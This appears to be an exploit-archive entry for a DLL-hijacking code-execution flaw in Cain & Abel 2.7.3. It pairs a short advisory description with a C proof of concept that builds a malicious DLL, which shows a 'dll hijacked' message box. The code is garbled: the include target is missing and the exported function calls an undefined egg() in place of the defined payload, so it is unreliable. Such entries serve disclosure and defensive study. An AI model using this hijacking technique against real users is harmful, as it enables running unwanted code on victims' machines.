// source: https://www.securityfocus.com/bid/46239/info Cain & Abel is prone to an arbitrary-code-execution vulnerability. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. Cain & Abel 2.7.3 is vulnerable; other versions may also be affected. #include #define DllExport __declspec (dllexport) DllExport void DwmSetWindowAttribute() { egg(); } int pwnme() { MessageBox(0, "dll hijacked !! ", "Dll Message", MB_OK); exit(0); return 0; }